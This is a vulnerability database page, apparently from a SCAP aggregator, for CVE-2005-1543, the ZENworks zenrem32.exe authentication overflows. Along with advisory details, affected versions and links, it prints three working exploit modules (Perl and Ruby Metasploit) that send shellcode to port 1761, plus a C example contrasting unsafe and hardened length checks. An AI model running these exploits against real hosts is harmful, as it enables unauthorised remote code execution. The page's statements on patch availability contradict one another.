CVE-2005-1543
CVSS 7.5
Published: 2005-05-25 00:00:00
Revised: 2016-10-17 23:20:38

[Original] Multiple stack-based and heap-based buffer overflows in Remote Management authentication (zenrem32.exe) on Novell ZENworks 6.5 Desktop and Server Management, ZENworks for Desktops 4.x, ZENworks for Servers 3.x, and Remote Management allows remote attackers to execute arbitrary code via (1) unspecified vectors, (2) type 1 authentication requests, and (3) type 2 authentication requests.


[CNNVD] Multiple remote overflow vulnerabilities in Novell ZENworks (CNNVD-200505-1199)

Novell ZENworks is a tool for remotely managing large networks.
The Novell ZENworks authentication protocol contains multiple remote overflow vulnerabilities; an attacker could exploit them to take control of the host.
ZENworks uses an authentication protocol to verify the requester when managing remote nodes. This protocol contains several heap and stack overflow vulnerabilities caused by unchecked copy lengths, sign misuse, and integer wrapping. A remote, unauthenticated attacker can exploit these vulnerabilities to take complete control of the system that handles the authentication request.

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:novell:zenworks_servers:3.2 - Novell ZENworks for Servers 3.2
cpe:/a:novell:zenworks:6.5 - Novell ZENworks Desktop Management 6.5
cpe:/a:novell:zenworks_desktops:4.0 - Novell ZENworks for Desktops 4.0
cpe:/a:novell:zenworks_remote_management - Novell ZENworks Remote Management
cpe:/a:novell:zenworks_server_management:6.5 - Novell ZENworks Server Management 6.5
cpe:/a:novell:zenworks_desktops:4.0.1 - Novell ZENworks for Desktops 4.0.1
cpe:/a:novell:zenworks_desktops:3.2:sp2 - Novell ZENworks for Desktops 3.2 SP2

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1543
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1543
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1199
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=111645317713662&w=2
(UNKNOWN)  BUGTRAQ  20050518 NOVELL ZENWORKS MULTIPLE REMØTE STACK & HEAP OVERFLOWS
http://securitytracker.com/id?1014005
(UNKNOWN)  SECTRACK  1014005
http://support.novell.com/cgi-bin/search/searchtid.cgi?/10097644.htm
(UNKNOWN)  CONFIRM  http://support.novell.com/cgi-bin/search/searchtid.cgi?/10097644.htm
http://www.rem0te.com/public/images/zen.pdf
(VENDOR_ADVISORY)  MISC  http://www.rem0te.com/public/images/zen.pdf
http://www.securityfocus.com/bid/13678
(UNKNOWN)  BID  13678
http://www.vupen.com/english/advisories/2005/0571
(UNKNOWN)  VUPEN  ADV-2005-0571
http://xforce.iss.net/xforce/xfdb/20639
(UNKNOWN)  XF  novell-zenwork-remote-management-bo(20639)
http://xforce.iss.net/xforce/xfdb/20644
(UNKNOWN)  XF  novell-zenwork-remote-management-1-bo(20644)
http://xforce.iss.net/xforce/xfdb/20645
(UNKNOWN)  XF  novell-zenwork-remote-management-2-bo(20645)

- Vulnerability Information

Multiple remote overflow vulnerabilities in Novell ZENworks
High risk  Buffer overflow
2005-05-25 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and Patches

The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's site:
http://support.novell.com/security-alerts

- Vulnerability Information (1150)

ZENworks 6.5 Desktop/Server Management Remote Stack Overflow (EDBID:1150)
windows remote
2005-08-12 Verified
1761 n/a
N/A [Click to download]
#
#

package Msf::Exploit::zenworks_desktop_agent;
use strict;
use base "Msf::Exploit";
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'  => 'ZENworks 6.5 Desktop/Server Management Remote Stack Overflow',
	'Version'  => '$Revision: 1.1 $',
	'Authors' =>
	  [
		'Anonymous',
	  ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'winxp', 'win2k', 'win2003' ],
	'Priv'  => 1,

	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 1761 ],
	  },
	  
	'Payload' =>
	  {
		'Space'     => 0x7FFF,
		'BadChars'  => "\x00",
		'Keys'      => ['+ws2ord'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
		This module exploits a heap overflow in the Novell ZENworks
        Desktop Management agent.
}),

	'Refs'  =>
	  [
		['BID', 13678],
	  ],  
	 
	'Targets' =>
	  [
		[ 'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent', 0x10002e06]
	  ],
	  
	'Keys'  => ['zenworks'],
};

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self        = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target      = $self->Targets->[$target_idx];

	$self->PrintLine( "[*] Attempting to exploit " . $target->[0] );

	my $s = Msf::Socket::Tcp->new(
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
	  );

	if ( $s->IsError ) {
		$self->PrintLine( '[*] Error creating socket: ' . $s->GetError );
		return;
	}

	my $req = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77";
	$self->PrintLine( "[*] Sending version identification" );
	$s->Send($req);

	my $ident = $s->Recv(-1, 16);
	if (length($ident) != 16) {
		$self->PrintLine( "[*] Failed to receive agent version identification" );
		return;
	}
	else {
		$self->PrintLine( "[*] Received agent version identification" );
	}

	$req = "\x00\x01";
	$self->PrintLine( "[*] Sending client acknowledgment" );
	$s->Send($req);

	# stack overflow in ZenRem32.exe / ZENworks Server Management
	$req = "\x00\x06metmet\x00\x06metmet\x7F\xFF" . $shellcode . "\x00\x01";
	$self->PrintLine( "[*] Sending authentication data (including shellcode)" );
	$s->Send($req);

	$s->Recv(2, 2);
	$s->Send("\x00\x01");

	#$s->Recv(2, 2);
	#my $len = $s->Recv(2,2);
	#$len = unpack ('n', $len);
	#$s->Recv($len, $len);

	$s->Send("\x00\x02");

	$self->PrintLine( "[*] Sending final payload" );

	# pop/pop/pop/pop/pop/ret in zencomm.dll on our shellcode
	my $crash = "A" x 0x20;
	$req = "\x00\x24" . $crash . pack('V', $target->[1]);
	$s->Send($req);

	$self->PrintLine("[*] Overflow request sent, sleeping for four seconds");
	select(undef, undef, undef, 4);

	$self->Handler($s);
	return;
}

1;

# milw0rm.com [2005-08-12]
		

- Vulnerability Information (16815)

Novell ZENworks 6.5 Desktop/Server Management Overflow (EDBID:16815)
windows remote
2010-07-25 Verified
0 metasploit
N/A [Click to download]
##
# $Id: zenworks_desktop_agent.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Novell ZENworks 6.5 Desktop/Server Management Overflow',
			'Description'    => %q{
					This module exploits a heap overflow in the Novell ZENworks
				Desktop Management agent. This vulnerability was discovered
				by Alex Wheeler.
			},
			'Author'         => [ 'anonymous' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					[ 'CVE', '2005-1543'],
					[ 'OSVDB', '16698'],
					[ 'BID', '13678'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 32767,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent',
						{
							'Platform' => 'win',
							'Ret'      => 0x10002e06,
						},
					],
				],
			'DisclosureDate' => 'May 19 2005',
			'DefaultTarget' => 0))
	end

	def exploit
		connect

		hello = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77"
		print_status("Sending version identification")
		sock.put(hello)

		pad   = Rex::Text.rand_text_alphanumeric(6, payload_badchars)
		ident = sock.get_once
		if !(ident and ident.length == 16)
			print_error("Failed to receive agent version identification")
			return
		end

		print_status("Received agent version identification")
		print_status("Sending client acknowledgement")
		sock.put("\x00\x01")

		# Stack buffer overflow in ZenRem32.exe / ZENworks Server Management
		sock.put("\x00\x06#{pad}\x00\x06#{pad}\x7f\xff" + payload.encoded + "\x00\x01")

		ack = sock.get_once
		sock.put("\x00\x01")
		sock.put("\x00\x02")

		print_status("Sending final payload")
		sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))

		print_status("Overflow request sent, sleeping for four seconds")
		select(nil,nil,nil,4)

		handler
		disconnect
	end

end
		

- Vulnerability Information (F83038)

Novell ZENworks 6.5 Desktop/Server Management Overflow (PacketStormID:F83038)
2009-11-26 00:00:00
anonymous  metasploit.com
exploit,overflow
CVE-2005-1543
[Click to download]

This Metasploit module exploits a heap overflow in the Novell ZENworks Desktop Management agent. This vulnerability was discovered by Alex Wheeler.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Novell ZENworks 6.5 Desktop/Server Management Overflow',
			'Description'    => %q{
				This module exploits a heap overflow in the Novell ZENworks
				Desktop Management agent. This vulnerability was discovered
				by Alex Wheeler.
					
			},
			'Author'         => [ 'anonymous' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-1543'],
					[ 'OSVDB', '16698'],
					[ 'BID', '13678'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 32767,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					[
						'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent',
						{
							'Platform' => 'win',
							'Ret'      => 0x10002e06,
						},
					],
				],
			'DisclosureDate' => 'May 19 2005',
			'DefaultTarget' => 0))
	end

	def exploit
		connect
		
		hello = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77"
		print_status("Sending version identification")
		sock.put(hello)
		
		pad   = Rex::Text.rand_text_alphanumeric(6, payload_badchars)
		ident = sock.get_once
		if !(ident and ident.length == 16)
			print_status("Failed to receive agent version identification")
			return
		end
		
		print_status("Received agent version identification")
		print_status("Sending client acknowledgement")
		sock.put("\x00\x01")
		
		# Stack overflow in ZenRem32.exe / ZENworks Server Management
		sock.put("\x00\x06#{pad}\x00\x06#{pad}\x7f\xff" + payload.encoded + "\x00\x01")
		
		ack = sock.get_once
		sock.put("\x00\x01")
		sock.put("\x00\x02")
		
		print_status("Sending final payload")
		sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V'))
		
		print_status("Overflow request sent, sleeping for four seconds")
		sleep(4)
		
		handler
		disconnect
	end
	
end
    

- Vulnerability Information

16698
Novell ZENworks Remote Management Authentication Multiple Remote Overflows
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity Solution Unknown
Exploit Public, Exploit Commercial

- Vulnerability Description

Multiple remote overflows exist in Novell ZENworks. The authentication protocol fails to properly check the sign and length of data received from the network resulting in a heap overflow. Also, the authentication protocol fails to properly check the length of submitted passwords when copying into a fixed-length buffer, resulting in a stack overflow. With a specially crafted request, an attacker can gain control of critical system processes on the target with elevated privileges, resulting in a loss of confidentiality and integrity.
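The two defects this description (and the CNNVD summary above) name are a length check that treats network-supplied data as signed, and a copy into a fixed-length buffer that is not bounded by that buffer. The following C example is added here for illustration and is not the code of zenrem32.exe or of any Novell component: it uses a constructed toy message layout ([16-bit big-endian length][data]) and an assumed 64-byte destination, and places the flawed check beside a hardened reader so the difference can be observed on the four constructed messages. The unsafe path only reports whether its check would have let the copy proceed; it never performs the copy.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 64   /* capacity of the fixed-size destination buffer (assumed) */

/* Constructed sample messages, layout [int16 big-endian length][length bytes].
 * This layout is a teaching stand-in, not the ZENworks wire format. */
static const uint8_t MSG_OK[]    = {0x00, 0x05, 'h', 'e', 'l', 'l', 'o'};
static const uint8_t MSG_NEG[]   = {0xFF, 0xFF, 'x'};        /* reads as -1 when signed */
static const uint8_t MSG_BIG[]   = {0x00, 0x80, 'x'};        /* 128 > FIELD_MAX */
static const uint8_t MSG_SHORT[] = {0x00, 0x10, 'a', 'b'};   /* claims 16 bytes, carries 2 */

/* Unsafe pattern from the advisory: the length is treated as signed, so a
 * negative value passes the "too large" test, and a later (size_t) cast would
 * wrap it to a huge count. The copy is deliberately not performed; the
 * function only reports whether the flawed check would have let it run. */
int unsafe_length_check_passes(const uint8_t *msg, size_t msg_len)
{
    if (msg_len < 2)
        return 0;
    int16_t len = (int16_t)((msg[0] << 8) | msg[1]);  /* sign misuse */
    if (len > FIELD_MAX)                              /* -1 > 64 is false: slips through */
        return 0;
    /* memcpy(dst, msg + 2, (size_t)len) would run here with a wrapped length */
    return 1;
}

/* Hardened version: unsigned length, bounded by both the destination capacity
 * (terminator included) and the bytes actually present in the message.
 * Returns the number of bytes copied, or -1 on any violation. */
int safe_read_field(const uint8_t *msg, size_t msg_len, char *dst, size_t dst_cap)
{
    if (msg_len < 2 || dst_cap == 0)
        return -1;
    uint16_t len = (uint16_t)((msg[0] << 8) | msg[1]);
    if (len > dst_cap - 1)      /* would not fit together with the NUL */
        return -1;
    if (len > msg_len - 2)      /* claimed length exceeds data actually received */
        return -1;
    memcpy(dst, msg + 2, len);
    dst[len] = '\0';
    return (int)len;
}

/* Convenience wrapper around a fixed buffer so results can be inspected. */
static char g_field[FIELD_MAX];

int read_field_demo(const uint8_t *msg, size_t msg_len)
{
    return safe_read_field(msg, msg_len, g_field, sizeof g_field);
}

const char *last_field(void)
{
    return g_field;
}

int main(void)
{
    struct { const char *name; const uint8_t *msg; size_t len; } cases[] = {
        {"ok",    MSG_OK,    sizeof MSG_OK},
        {"neg",   MSG_NEG,   sizeof MSG_NEG},
        {"big",   MSG_BIG,   sizeof MSG_BIG},
        {"short", MSG_SHORT, sizeof MSG_SHORT},
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        printf("%-5s unsafe check passes: %d   safe result: %d\n",
               cases[i].name,
               unsafe_length_check_passes(cases[i].msg, cases[i].len),
               read_field_demo(cases[i].msg, cases[i].len));
    }
    return 0;
}
```

Of the four constructed messages, only the well-formed one is accepted by the hardened reader, whereas the signed check waves through both the negative length and the message whose claimed length exceeds the bytes received; the second bound (claimed length against bytes present) is the one most often forgotten when only the destination size is checked.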

- Timeline

2005-05-19 Unknown
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability Author

- Vulnerability Information

Novell ZENworks Multiple Remote Pre-Authentication Buffer Overflow Vulnerabilities
Boundary Condition Error 13678
Yes No
2005-05-18 12:00:00 2009-07-12 02:56:00
Discovery of this vulnerability is credited to Alex Wheeler.

- Affected Program Versions

Novell ZENworks Server Management 6.5
Novell ZENworks Remote Management
Novell ZENworks for Servers 3.2
Novell ZENworks for Desktops 4.0.1
Novell ZENworks for Desktops 4.0
Novell ZENworks for Desktops 3.2 SP2
Novell ZENworks Desktop Management 6.5

- Vulnerability Discussion

Novell ZENworks is prone to multiple remote pre-authentication buffer overflow vulnerabilities.

The issues exist in the 'zenrem32.exe' executable and may be exploited by a remote attacker to execute arbitrary code in the context of the affected service.

- Exploit

The zenworks_desktop_agent.pm exploit is available for Metasploit.

- Solution

The vendor has released an advisory that acknowledges the reality of these issues. Fixes are pending release.

The vendor has released a beta patch addressing this issue. Please see the referenced technical information document for further information.


Novell ZENworks Remote Management

Novell ZENworks for Desktops 3.2 SP2

Novell ZENworks for Desktops 4.0

Novell ZENworks for Desktops 4.0.1

Novell ZENworks Desktop Management 6.5

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright Notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.